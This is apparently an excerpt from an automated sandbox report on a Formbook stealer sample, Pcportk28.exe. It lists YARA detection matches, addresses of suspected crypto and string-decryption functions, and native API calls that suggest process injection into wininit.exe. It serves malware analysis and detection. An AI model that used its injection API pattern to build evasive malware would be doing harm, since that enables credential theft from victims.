Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Detected potential crypto function

Source: C:\Users\Public\Pcportk28.exe	Code function: 4_2_00356226		4_2_00356226
Source: C:\Users\Public\Pcportk28.exe	Code function: 4_2_00354368		4_2_00354368
Source: C:\Users\Public\Pcportk28.exe	Code function: 4_2_00356C00		4_2_00356C00
Source: C:\Users\Public\Pcportk28.exe	Code function: 4_2_00356479		4_2_00356479
Source: C:\Users\Public\Pcportk28.exe	Code function: 4_2_00356720		4_2_00356720
Source: C:\Users\Public\Pcportk28.exe	Code function: 4_2_00354968		4_2_00354968
Source: C:\Users\Public\Pcportk28.exe	Code function: 4_2_00358990		4_2_00358990
Source: C:\Users\Public\Pcportk28.exe	Code function: 4_2_00358980		4_2_00358980
Source: C:\Users\Public\Pcportk28.exe	Code function: 4_2_009E11AB		4_2_009E11AB
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0041C001		5_2_0041C001
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00401030		5_2_00401030
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0041B8C3		5_2_0041B8C3
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0041C948		5_2_0041C948
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00408C80		5_2_00408C80
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0041BD22		5_2_0041BD22
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00402D8A		5_2_00402D8A
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00402D90		5_2_00402D90
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00402FB0		5_2_00402FB0
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0085E0C6		5_2_0085E0C6
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0088D005		5_2_0088D005
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00863040		5_2_00863040
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0087905A		5_2_0087905A
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008DD06D		5_2_008DD06D
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0085E2E9		5_2_0085E2E9
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00901238		5_2_00901238
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_009063BF		5_2_009063BF
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0085F3CF		5_2_0085F3CF
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008863DB		5_2_008863DB
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00862305		5_2_00862305
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00867353		5_2_00867353
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008AA37B		5_2_008AA37B
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00895485		5_2_00895485
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00871489		5_2_00871489
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008E443E		5_2_008E443E
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0089D47D		5_2_0089D47D
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008E05E3		5_2_008E05E3
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0087C5F0		5_2_0087C5F0
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0086351F		5_2_0086351F
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008A6540		5_2_008A6540
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00864680		5_2_00864680
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0086E6C1		5_2_0086E6C1
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00902622		5_2_00902622
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008AA634		5_2_008AA634
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008E579A		5_2_008E579A
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0086C7BC		5_2_0086C7BC
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008957C3		5_2_008957C3
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008DF8C4		5_2_008DF8C4
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008FF8EE		5_2_008FF8EE
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0086C85C		5_2_0086C85C
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0088286D		5_2_0088286D
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0090098E		5_2_0090098E
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008629B2		5_2_008629B2
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008769FE		5_2_008769FE
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008E394B		5_2_008E394B
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008E5955		5_2_008E5955
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00913A83		5_2_00913A83
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0090CBA4		5_2_0090CBA4
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008E6BCB		5_2_008E6BCB
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0085FBD7		5_2_0085FBD7
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008EDBDA		5_2_008EDBDA
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00887B00		5_2_00887B00
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008FFDDD		5_2_008FFDDD
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025D1238		7_2_025D1238
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0252E2E9		7_2_0252E2E9
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02537353		7_2_02537353
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0257A37B		7_2_0257A37B
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02532305		7_2_02532305
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025563DB		7_2_025563DB
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0252F3CF		7_2_0252F3CF
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025D63BF		7_2_025D63BF
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0254905A		7_2_0254905A
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02533040		7_2_02533040
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0255D005		7_2_0255D005
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0252E0C6		7_2_0252E0C6
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0257A634		7_2_0257A634
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025D2622		7_2_025D2622
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0253E6C1		7_2_0253E6C1
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02534680		7_2_02534680
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025657C3		7_2_025657C3
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025B579A		7_2_025B579A
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0253C7BC		7_2_0253C7BC
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0256D47D		7_2_0256D47D
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025B443E		7_2_025B443E
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02565485		7_2_02565485
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02541489		7_2_02541489
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02576540		7_2_02576540
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0253351F		7_2_0253351F
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0254C5F0		7_2_0254C5F0
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025E3A83		7_2_025E3A83
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02557B00		7_2_02557B00
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025BDBDA		7_2_025BDBDA
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0252FBD7		7_2_0252FBD7
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025DCBA4		7_2_025DCBA4
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0253C85C		7_2_0253C85C
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0255286D		7_2_0255286D
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025CF8EE		7_2_025CF8EE
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025B5955		7_2_025B5955
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025B394B		7_2_025B394B
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025469FE		7_2_025469FE
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025D098E		7_2_025D098E
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025329B2		7_2_025329B2
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0254EE4C		7_2_0254EE4C
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02562E2F		7_2_02562E2F
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0255DF7C		7_2_0255DF7C
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02540F3F		7_2_02540F3F
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025A2FDC		7_2_025A2FDC
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025CCFB1		7_2_025CCFB1
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0253CD5B		7_2_0253CD5B
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02560D3B		7_2_02560D3B
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025CFDDD		7_2_025CFDDD
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000FC948		7_2_000FC948
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000E8C80		7_2_000E8C80
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000E2D8A		7_2_000E2D8A
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000E2D90		7_2_000E2D90
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000E2FB0		7_2_000E2FB0

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\wininit.exe	Code function: String function: 0259F970 appears 82 times
Source: C:\Windows\SysWOW64\wininit.exe	Code function: String function: 02573F92 appears 132 times
Source: C:\Windows\SysWOW64\wininit.exe	Code function: String function: 0257373B appears 245 times
Source: C:\Windows\SysWOW64\wininit.exe	Code function: String function: 0252E2A8 appears 38 times
Source: C:\Windows\SysWOW64\wininit.exe	Code function: String function: 0252DF5C appears 119 times
Source: C:\Users\Public\Pcportk28.exe	Code function: String function: 0085E2A8 appears 36 times
Source: C:\Users\Public\Pcportk28.exe	Code function: String function: 008CF970 appears 78 times
Source: C:\Users\Public\Pcportk28.exe	Code function: String function: 008A373B appears 214 times
Source: C:\Users\Public\Pcportk28.exe	Code function: String function: 008A3F92 appears 110 times
Source: C:\Users\Public\Pcportk28.exe	Code function: String function: 0085DF5C appears 105 times

Contains functionality to call native functions

Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_004185E0 NtCreateFile,		5_2_004185E0
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00418690 NtReadFile,		5_2_00418690
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00418710 NtClose,		5_2_00418710
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_004187C0 NtAllocateVirtualMemory,		5_2_004187C0
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_004185DA NtCreateFile,		5_2_004185DA
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0041870B NtClose,		5_2_0041870B
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008500C4 NtCreateFile,LdrInitializeThunk,		5_2_008500C4
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00850048 NtProtectVirtualMemory,LdrInitializeThunk,		5_2_00850048
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00850078 NtResumeThread,LdrInitializeThunk,		5_2_00850078
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008507AC NtCreateMutant,LdrInitializeThunk,		5_2_008507AC
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084F9F0 NtClose,LdrInitializeThunk,		5_2_0084F9F0
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084F900 NtReadFile,LdrInitializeThunk,		5_2_0084F900
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		5_2_0084FAD0
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk,		5_2_0084FAE8
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk,		5_2_0084FBB8
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk,		5_2_0084FB68
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FC90 NtUnmapViewOfSection,LdrInitializeThunk,		5_2_0084FC90
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk,		5_2_0084FC60
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FD8C NtDelayExecution,LdrInitializeThunk,		5_2_0084FD8C
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk,		5_2_0084FDC0
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FEA0 NtReadVirtualMemory,LdrInitializeThunk,		5_2_0084FEA0
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		5_2_0084FED0
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FFB4 NtCreateSection,LdrInitializeThunk,		5_2_0084FFB4
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008510D0 NtOpenProcessToken,		5_2_008510D0
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00850060 NtQuerySection,		5_2_00850060
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008501D4 NtSetValueKey,		5_2_008501D4
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0085010C NtOpenDirectoryObject,		5_2_0085010C
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00851148 NtOpenThread,		5_2_00851148
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084F8CC NtWaitForSingleObject,		5_2_0084F8CC
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00851930 NtSetContextThread,		5_2_00851930
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084F938 NtWriteFile,		5_2_0084F938
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FAB8 NtQueryValueKey,		5_2_0084FAB8
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FA20 NtQueryInformationFile,		5_2_0084FA20
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FA50 NtEnumerateValueKey,		5_2_0084FA50
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FBE8 NtQueryVirtualMemory,		5_2_0084FBE8
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FB50 NtCreateKey,		5_2_0084FB50
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FC30 NtOpenProcess,		5_2_0084FC30
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00850C40 NtGetContextThread,		5_2_00850C40
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0084FC48 NtSetInformationFile,		5_2_0084FC48
